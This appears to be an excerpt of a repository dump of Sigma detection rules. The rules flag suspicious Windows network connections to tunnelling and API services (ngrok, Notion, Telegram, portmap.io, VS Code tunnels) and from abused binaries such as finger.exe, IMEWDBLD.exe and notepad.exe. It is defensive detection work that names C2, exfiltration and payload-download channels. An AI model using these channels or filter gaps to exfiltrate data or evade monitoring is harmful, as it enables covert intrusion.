    "content": "title: Communication To Ngrok Tunneling Service Initiated\nid: 1d08ac94-400d-4469-a82f-daee9a908849\nrelated:\n    - id: 18249279-932f-45e2-b37a-8925f2597670\n      type: similar\nstatus: test\ndescription: |\n    Detects an executable initiating a network connection to \"ngrok\" tunneling domains.\n    Attackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\n    While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.\nreferences:\n    - https://twitter.com/hakluke/status/1587733971814977537/photo/1\n    - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-03\nmodified: 2024-02-02\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1568.002\n    - attack.t1572\n    - attack.t1090\n    - attack.t1102\n    - attack.s0508\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationHostname|contains:\n            - 'tunnel.us.ngrok.com'\n            - 'tunnel.eu.ngrok.com'\n            - 'tunnel.ap.ngrok.com'\n            - 'tunnel.au.ngrok.com'\n            - 'tunnel.sa.ngrok.com'\n            - 'tunnel.jp.ngrok.com'\n            - 'tunnel.in.ngrok.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the ngrok service.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_notion_api_susp_communication.yml",
    "content": "title: Potentially Suspicious Network Connection To Notion API\nid: 7e9cf7b6-e827-11ed-a05b-15959c120003\nstatus: test\ndescription: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as \"OffensiveNotion C2\"\nreferences:\n    - https://github.com/mttaggart/OffensiveNotion\n    - https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332\nauthor: Gavin Knapp\ndate: 2023-05-03\ntags:\n    - attack.command-and-control\n    - attack.t1102\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains: 'api.notion.com'\n    filter_main_notion:\n        Image|endswith: '\\AppData\\Local\\Programs\\Notion\\Notion.exe'\n    filter_main_brave:\n        Image|endswith: '\\brave.exe'\n    filter_main_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_main_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_main_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_main_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_main_opera:\n        Image|endswith: '\\opera.exe'\n    filter_main_safari:\n        Image|endswith: '\\safari.exe'\n    filter_main_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_main_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_main_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate applications communicating with the \"api.notion.com\" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured.\nlevel: low\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_portmap.yml",
    "content": "title: Network Communication Initiated To Portmap.IO Domain\nid: 07837ab9-60e1-481f-a74d-c31fb496a94c\nstatus: test\ndescription: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors\nreferences:\n    - https://portmap.io/\n    - https://github.com/rapid7/metasploit-framework/issues/11337\n    - https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2\nauthor: Florian Roth (Nextron Systems)\ndate: 2024-05-31\ntags:\n    - attack.t1041\n    - attack.command-and-control\n    - attack.t1090.002\n    - attack.exfiltration\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: '.portmap.io'\n    condition: selection\nfalsepositives:\n    - Legitimate use of portmap.io domains\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_telegram_api_non_browser_access.yml",
    "content": "title: Suspicious Non-Browser Network Communication With Telegram API\nid: c3dbbc9f-ef1d-470a-a90a-d343448d5875\nstatus: test\ndescription: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2\nreferences:\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-19\ntags:\n    - attack.command-and-control\n    - attack.exfiltration\n    - attack.t1102\n    - attack.t1567\n    - attack.t1105\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains: 'api.telegram.org'\n    # Other browsers or apps known to use telegram should be added\n    # TODO: Add full paths for default install locations\n    filter_main_brave:\n        Image|endswith: '\\brave.exe'\n    filter_main_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_main_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_main_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_main_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_main_opera:\n        Image|endswith: '\\opera.exe'\n    filter_main_safari:\n        Image|endswith: '\\safari.exe'\n    filter_main_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_main_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_main_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS  etc.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_vscode_tunnel_connection.yml",
    "content": "title: Network Connection Initiated To Visual Studio Code Tunnels Domain\nid: 4b657234-038e-4ad5-997c-4be42340bce4\nrelated:\n    - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels\n      type: similar\n    - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode\n      type: similar\n    - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels\n      type: similar\nstatus: test\ndescription: |\n    Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\n    - https://cydefops.com/vscode-data-exfiltration\nauthor: Kamran Saifullah\ndate: 2023-11-20\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1572\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: '.tunnels.api.visualstudio.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Visual Studio Code tunnel will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_eqnedt.yml",
    "content": "title: Network Connection Initiated By Eqnedt32.EXE\nid: a66bc059-c370-472c-a0d7-f8fd1bf9d583\nstatus: test\ndescription: Detects network connections from the Equation Editor process \"eqnedt32.exe\".\nreferences:\n    - https://twitter.com/forensicitguy/status/1513538712986079238\n    - https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/\n    - https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-04-14\nmodified: 2024-05-31\ntags:\n    - attack.execution\n    - attack.t1203\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\eqnedt32.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_finger.yml",
    "content": "title: Network Connection Initiated via Finger.EXE\nid: 2fdaf50b-9fd5-449f-ba69-f17248119af6\nrelated:\n    - id: c082c2b0-525b-4dbc-9a26-a57dc4692074\n      type: similar\n    - id: af491bca-e752-4b44-9c86-df5680533dbc\n      type: similar\nstatus: experimental\ndescription: |\n    Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.\n    In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.\n    Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.\n    Investigating such network connections can also help identify potential malicious infrastructure used by threat actors\nreferences:\n    - https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-19\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\finger.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_imewdbld.yml",
    "content": "title: Network Connection Initiated By IMEWDBLD.EXE\nid: 8d7e392e-9b28-49e1-831d-5949c6281228\nrelated:\n    - id: 863218bd-c7d0-4c52-80cd-0a96c09f54af\n      type: derived\nstatus: test\ndescription: |\n    Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download\n    - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/\nauthor: frack113\ndate: 2022-01-22\nmodified: 2023-11-09\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\IMEWDBLD.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\n# Note: Please reduce this to medium if you find legitimate connections\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_notepad.yml",
    "content": "title: Network Connection Initiated Via Notepad.EXE\nid: e81528db-fc02-45e8-8e98-4e84aba1f10b\nstatus: test\ndescription: |\n    Detects a network connection that is initiated by the \"notepad.exe\" process.\n    This might be a sign of process injection from a beacon process or something similar.\n    Notepad rarely initiates a network communication except when printing documents for example.\nreferences:\n    - https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf\n    - https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet\nauthor: EagleEye Team\ndate: 2020-05-14\nmodified: 2024-02-02\ntags:\n    - attack.privilege-escalation\n    - attack.command-and-control\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\notepad.exe'\n    filter_optional_printing:\n        DestinationPort: 9100\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Printing documents via notepad might cause communication with the printer via port 9100 or similar.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_office_outbound_non_local_ip.yml",
    "content": "title: Office Application Initiated Network Connection To Non-Local IP\nid: 75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84\nstatus: test\ndescription: |\n    Detects an office application (Word, Excel, PowerPoint)  that initiate a network connection to a non-private IP addresses.\n    This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.\n    This rule will require an initial baseline and tuning that is specific to your organization.\nreferences:\n    - https://corelight.com/blog/detecting-cve-2021-42292\n    - https://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide\nauthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-11-10\nmodified: 2025-10-17\ntags:\n    - attack.execution\n    - attack.t1203\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n            - '\\wordview.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_main_msrange_generic:\n        DestinationIp|cidr:\n            - '2.16.56.0/23' # Akamai International B.V.\n            - '2.17.248.0/21' # Akamai International B.V.\n            - '13.107.240.0/21' # Microsoft Corporation\n            - '20.184.0.0/13' # Microsoft Corporation\n            - '23.61.224.0/20' # Akamai-AS\n            - '20.192.0.0/10' # Microsoft Corporation\n            - '23.72.0.0/13' # Akamai International B.V.\n            - '23.3.88.0/22' # Akamai-AS\n            - '23.216.132.0/22' # Akamai-AS\n            - '40.76.0.0/14' # Microsoft Corporation\n            - '51.10.0.0/15' # Microsoft Corporation\n            - '51.103.0.0/16' # Microsoft Corporation\n            - '51.104.0.0/15' # Microsoft Corporation\n            - '51.142.136.0/22' # Microsoft Corporation - https://ipinfo.io/AS8075/51.140.0.0/14-51.142.136.0/22\n            - '52.160.0.0/11' # Microsoft Corporation - https://ipinfo.io/AS8075/52.160.0.0/11\n            - '95.101.96.0/21' # Akamai-As\n            - '204.79.197.0/24' # Microsoft Corporation\n    filter_main_msrange_exchange_1:\n        # Exchange Online\n        # \"urls\": [\n        #       \"outlook.cloud.microsoft\",\n        #       \"outlook.office.com\",\n        #       \"outlook.office365.com\"\n        # ]\n        DestinationIp|cidr:\n            - '13.107.4.0/22'\n            - '13.107.6.152/31'\n            - '13.107.18.10/31'\n            - '13.107.42.0/23'\n            - '13.107.128.0/22'\n            - '23.35.224.0/20'\n            - '23.53.40.0/22'\n            - '23.103.160.0/20'\n            - '23.216.76.0/22'\n            - '40.96.0.0/13'\n            - '40.104.0.0/15'\n            - '52.96.0.0/14'\n            - '131.253.33.215/32'\n            - '132.245.0.0/16'\n            - '150.171.32.0/22'\n            - '204.79.197.215/32'\n            - '2603:1006::/40'\n            - '2603:1016::/36'\n            - '2603:1026::/36'\n            - '2603:1036::/36'\n            - '2603:1046::/36'\n            - '2603:1056::/36'\n            - '2620:1ec:4::152/128'\n            - '2620:1ec:4::153/128'\n            - '2620:1ec:c::10/128'\n            - '2620:1ec:c::11/128'\n            - '2620:1ec:d::10/128'\n            - '2620:1ec:d::11/128'\n            - '2620:1ec:8f0::/46'\n            - '2620:1ec:900::/46'\n            - '2620:1ec:a92::152/128'\n            - '2620:1ec:a92::153/128'\n        DestinationPort:\n            - 80\n            - 443\n    filter_main_msrange_exchange_2:\n        # Exchange Online\n        # \"urls\": [\n        #       \"outlook.office365.com\",\n        #       \"smtp.office365.com\"\n        # ]\n        DestinationIp|cidr:\n            - '13.107.6.152/31'\n            - '13.107.18.10/31'\n            - '13.107.128.0/22'\n            - '23.103.160.0/20'\n            - '40.96.0.0/13'\n            - '40.104.0.0/15'\n            - '52.96.0.0/14'\n            - '131.253.33.215/32'\n            - '132.245.0.0/16'\n            - '150.171.32.0/22'\n            - '204.79.197.215/32'\n            - '2603:1006::/40'\n            - '2603:1016::/36'\n            - '2603:1026::/36'\n            - '2603:1036::/36'\n            - '2603:1046::/36'\n            - '2603:1056::/36'\n            - '2620:1ec:4::152/128'\n            - '2620:1ec:4::153/128'\n            - '2620:1ec:c::10/128'\n            - '2620:1ec:c::11/128'\n            - '2620:1ec:d::10/128'\n            - '2620:1ec:d::11/128'\n            - '2620:1ec:8f0::/46'\n            - '2620:1ec:900::/46'\n            - '2620:1ec:a92::152/128'\n            - '2620:1ec:a92::153/128'\n        DestinationPort:\n            - 143\n            - 587\n            - 993\n            - 995\n        Protocol: 'tcp'\n    filter_main_msrange_exchange_3:\n        # Exchange Online\n        # \"urls\": [\n        #       \"*.protection.outlook.com\"\n        #  ]\n        DestinationIp|cidr:\n            - '40.92.0.0/15'\n            - '40.107.0.0/16'\n            - '52.100.0.0/14'\n            - '52.238.78.88/32'\n            - '104.47.0.0/17'\n            - '2a01:111:f400::/48'\n            - '2a01:111:f403::/48'\n        DestinationPort: 443\n    filter_main_msrange_exchange_4:\n        # Exchange Online\n        # \"urls\": [\n        #       \"*.mail.protection.outlook.com\",\n        #       \"*.mx.microsoft\"\n        #  ]\n        DestinationIp|cidr:\n            - '40.92.0.0/15'\n            - '40.107.0.0/16'\n            - '52.100.0.0/14'\n            - '52.238.78.88/32'\n            - '104.47.0.0/17'\n            - '2a01:111:f400::/48'\n            - '2a01:111:f403::/48'\n        DestinationPort: 25\n    filter_main_msrange_sharepoint_1:\n        # SharePoint Online and OneDrive for Business\",\n        # \"urls\": [\n        #       \"*.sharepoint.com\"\n        # ]\n        DestinationIp|cidr:\n            - '13.107.136.0/22'\n            - '40.108.128.0/17'\n            - '52.104.0.0/14'\n            - '104.146.128.0/17'\n            - '150.171.40.0/22'\n            - '2603:1061:1300::/40'\n            - '2620:1ec:8f8::/46'\n            - '2620:1ec:908::/46'\n            - '2a01:111:f402::/48'\n        DestinationPort:\n            - 80\n            - 443\n        Protocol: 'tcp'\n    filter_main_msrange_office_1:\n        # Microsoft 365 Common and Office Online\",\n        # \"urls\": [\n        #       \"*.officeapps.live.com\",\n        #       \"*.online.office.com\",\n        #       \"office.live.com\",\n        #       \"office.com.akadns.net\"\n        # ],\n        DestinationIp|cidr:\n            - '13.107.6.171/32'\n            - '13.107.18.15/32'\n            - '13.107.140.6/32'\n            - '20.64.0.0/10'\n            - '52.108.0.0/14'\n            - '52.244.37.168/32'\n            - '2603:1006:1400::/40'\n            - '2603:1016:2400::/40'\n            - '2603:1026:2400::/40'\n            - '2603:1036:2400::/40'\n            - '2603:1046:1400::/40'\n            - '2603:1056:1400::/40'\n            - '2603:1063:2000::/38'\n            - '2620:1ec:c::15/128'\n            - '2620:1ec:8fc::6/128'\n            - '2620:1ec:a92::171/128'\n            - '2a01:111:f100:2000::a83e:3019/128'\n            - '2a01:111:f100:2002::8975:2d79/128'\n            - '2a01:111:f100:2002::8975:2da8/128'\n            - '2a01:111:f100:7000::6fdd:6cd5/128'\n            - '2a01:111:f100:a004::bfeb:88cf/128'\n        DestinationPort:\n            - 80\n            - 443\n        Protocol: 'tcp'\n    filter_main_msrange_office_2:\n        # Microsoft 365 Common and Office Online\n        # \"urls\": [\n        #       \"*.auth.microsoft.com\",\n        #       \"*.msftidentity.com\",\n        #       \"*.msidentity.com\",\n        #       \"account.activedirectory.windowsazure.com\",\n        #       \"accounts.accesscontrol.windows.net\",\n        #       \"adminwebservice.microsoftonline.com\",\n        #       \"api.passwordreset.microsoftonline.com\",\n        #       \"autologon.microsoftazuread-sso.com\",\n        #       \"becws.microsoftonline.com\",\n        #       \"ccs.login.microsoftonline.com\",\n        #       \"clientconfig.microsoftonline-p.net\",\n        #       \"cloudapp.azure.com\",\n        #       \"companymanager.microsoftonline.com\",\n        #       \"device.login.microsoftonline.com\",\n        #       \"graph.microsoft.com\",\n        #       \"graph.windows.net\",\n        #       \"login-us.microsoftonline.com\",\n        #       \"login.microsoft.com\",\n        #       \"login.microsoftonline-p.com\",\n        #       \"login.microsoftonline.com\",\n        #       \"login.windows.net\",\n        #       \"logincert.microsoftonline.com\",\n        #       \"loginex.microsoftonline.com\",\n        #       \"nexus.microsoftonline-p.com\",\n        #       \"passwordreset.microsoftonline.com\",\n        #       \"provisioningapi.microsoftonline.com\",\n        #       \"web.core.windows.net\",\n        # ]\n        DestinationIp|cidr:\n            - '172.128.0.0/10'\n            - '20.20.32.0/19'\n            - '20.103.156.88/32' # msn.com\n            - '20.190.128.0/18'\n            - '20.231.128.0/19'\n            - '40.126.0.0/18'\n            - '57.150.0.0/15'\n            - '2603:1006:2000::/48'\n            - '2603:1007:200::/48'\n            - '2603:1016:1400::/48'\n            - '2603:1017::/48'\n            - '2603:1026:3000::/48'\n            - '2603:1027:1::/48'\n            - '2603:1036:3000::/48'\n            - '2603:1037:1::/48'\n            - '2603:1046:2000::/48'\n            - '2603:1047:1::/48'\n            - '2603:1056:2000::/48'\n            - '2603:1057:2::/48'\n        DestinationPort:\n            - 80\n            - 443\n        Protocol: 'tcp'\n    filter_main_msrange_office_3:\n        # Microsoft 365 Common and Office Online\n        #  \"urls\": [\n        #       \"*.compliance.microsoft.com\",\n        #       \"*.data.microsoft.com\",\n        #       \"*.protection.office.com\",\n        #       \"*.security.microsoft.com\",\n        #       \"compliance.microsoft.com\",\n        #       \"defender.microsoft.com\",\n        #       \"protection.office.com\",\n        #       \"security.microsoft.com\",\n        #       \"teams.microsoft.com\",\n        #  ]\n        DestinationIp|cidr:\n            - '13.64.0.0/11'\n            - '13.107.6.192/32'\n            - '13.107.9.192/32'\n            - '13.89.179.14/32'\n            - '20.40.0.0/14'\n            - '20.48.0.0/12'\n            - '20.64.0.0/12'\n            - '52.123.0.0/16'\n            - '52.108.0.0/14'\n            - '52.136.0.0/13'\n            - '57.150.0.0/15'\n            - '80.239.150.67/32' # Arelion Sweden AB\n            - '2620:1ec:4::192/128'\n            - '2620:1ec:a92::192/128'\n        DestinationPort: 443\n        Protocol: 'tcp'\n    filter_main_destination_host:\n        DestinationHostname|endswith: '.deploy.static.akamaitechnologies.com'\n        DestinationPort: 443\n        Protocol: 'tcp'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.\n    - Office documents commonly have templates that refer to external addresses, like \"sharepoint.ourcompany.com\" may have to be tuned.\n    - It is highly recommended to baseline your activity and tune out common business use cases.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_office_uncommon_ports.yml",
    "content": "title: Office Application Initiated Network Connection Over Uncommon Ports\nid: 3b5ba899-9842-4bc2-acc2-12308498bf42\nstatus: test\ndescription: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-12\nmodified: 2025-10-17\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\winword.exe'\n            - '\\wordview.exe'\n    filter_main_common_ports:\n        DestinationPort:\n            - 53 # DNS\n            - 80 # HTTP\n            - 139 # NETBIOS\n            - 389 # LDAP\n            - 443 # HTTPS\n            - 445 # SMB\n            - 3268 # MSFT-GC\n    filter_main_outlook_ports:\n        Image|contains: ':\\Program Files\\Microsoft Office\\'\n        Image|endswith: '\\OUTLOOK.EXE'\n        DestinationPort:\n            - 143\n            - 465 # SMTP\n            - 587 # SMTP\n            - 993 # IMAP\n            - 995 # POP3\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Other ports can be used, apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_python.yml",
    "content": "title: Python Initiated Connection\nid: bef0bc5a-b9ae-425d-85c6-7b2d705980c6\nstatus: test\ndescription: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python\n    - https://pypi.org/project/scapy/\nauthor: frack113\ndate: 2021-12-10\nmodified: 2025-03-05\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: network_connection\n    product: windows\n    definition: 'Requirements: Field enrichment is required for the filters to work. As field such as CommandLine and ParentImage are not available by default on this event type'\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|contains|all:\n            - '\\python'\n            - '.exe'\n    filter_optional_conda:\n        # Related to anaconda updates. Command example: \"conda update conda\"\n        # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage\n        ParentImage: C:\\ProgramData\\Anaconda3\\Scripts\\conda.exe\n        CommandLine|contains|all:\n            - ':\\ProgramData\\Anaconda3\\Scripts\\conda-script.py'\n            - 'update'\n    filter_optional_conda_jupyter_notebook:\n        # Related to anaconda opening an instance of Jupyter Notebook\n        # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage\n        ParentImage: C:\\ProgramData\\Anaconda3\\python.exe\n        CommandLine|contains: 'C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py'\n    filter_main_local_communication:\n        # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python opening sockets locally etc. So comment this out if you want to monitor for those instances\n        DestinationIp: 127.0.0.1\n        SourceIp: 127.0.0.1\n    filter_main_pip:\n        CommandLine|contains|all:\n            - 'pip.exe'\n            - 'install'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate python scripts using the socket library or similar will trigger this. Apply additional filters and perform an initial baseline before deploying.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml",
    "content": "title: Outbound RDP Connections Over Non-Standard Tools\nid: ed74fe75-7594-4b4b-ae38-e38e3fd2eb23\nstatus: test\ndescription: |\n    Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.\n    An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.\nreferences:\n    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708\nauthor: Markus Neis\ndate: 2019-05-15\nmodified: 2024-02-09\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationPort: 3389\n        Initiated: 'true'\n    filter_main_mstsc:\n        Image:\n            - 'C:\\Windows\\System32\\mstsc.exe'\n            - 'C:\\Windows\\SysWOW64\\mstsc.exe'\n    filter_optional_dns:\n        # Note: https://github.com/SigmaHQ/sigma/pull/2249\n        Image: 'C:\\Windows\\System32\\dns.exe'\n        SourcePort: 53\n        Protocol: 'udp'\n    filter_optional_avast:\n        Image|endswith:\n            - '\\Avast Software\\Avast\\AvastSvc.exe'\n            - '\\Avast\\AvastSvc.exe'\n    filter_optional_sysinternals_rdcman:\n        Image|endswith: '\\RDCMan.exe'\n    filter_optional_chrome:\n        Image: 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_third_party:\n        Image|endswith:\n            - '\\FSAssessment.exe'\n            - '\\FSDiscovery.exe'\n            - '\\MobaRTE.exe'\n            - '\\mRemote.exe'\n            - '\\mRemoteNG.exe'\n            - '\\Passwordstate.exe'\n            - '\\RemoteDesktopManager.exe'\n            - '\\RemoteDesktopManager64.exe'\n            - '\\RemoteDesktopManagerFree.exe'\n            - '\\RSSensor.exe'\n            - '\\RTS2App.exe'\n            - '\\RTSApp.exe'\n            - '\\spiceworks-finder.exe'\n            - '\\Terminals.exe'\n            - '\\ws_TunnelService.exe'\n    filter_optional_thor:\n        Image|endswith:\n            - '\\thor.exe'\n            - '\\thor64.exe'\n    filter_optional_splunk:\n        Image|startswith: 'C:\\Program Files\\SplunkUniversalForwarder\\bin\\'\n    filter_optional_sentinel_one:\n        Image|endswith: '\\Ranger\\SentinelRanger.exe'\n    filter_optional_firefox:\n        Image: 'C:\\Program 